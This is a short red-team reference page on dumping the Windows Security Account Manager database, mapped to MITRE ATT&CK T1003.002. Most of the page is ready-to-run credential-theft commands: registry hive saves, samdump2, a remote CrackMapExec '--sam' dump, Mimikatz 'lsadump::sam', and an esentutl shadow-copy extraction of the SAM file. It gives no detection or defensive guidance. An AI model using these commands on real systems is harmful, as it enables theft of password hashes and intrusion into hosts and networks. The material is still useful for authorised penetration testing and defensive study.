Security Account Manager (SAM)

MITRE ATT&CK, Credential Access, Sub-technique T1003.002

The Security Accounts Manager (SAM) is a database file in Windows that contains usernames and passwords for local accounts, typically those identified from the net user command.

The SAM is a database file that contains local accounts for the host, typically those found with the net user command.

# Manually extracting the SAM
reg save HKLM\sam sam
reg save HKLM\system system

# Analyzing extracted files
samdump2 system sam 

# Dumping the SAM remotely with CrackMapExec
crackmapexec smb $ip -u $username -p $password --sam

# Dumping the SAM with Mimikatz
mimikatz lsadump::sam

It is also possible to dump the SAM file via esentutl.exe which comes installed by default with Windows:

esentutl.exe /y /vss C:\Windows\System32\config\SAM /d c:\temp\sam

References

Dumping Hashes from SAM via RegistryRed Teaming Experiments

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-sam-via-esentutl.exewww.ired.team

PreviousNTDS NextKerberos Tickets

Last updated 2 years ago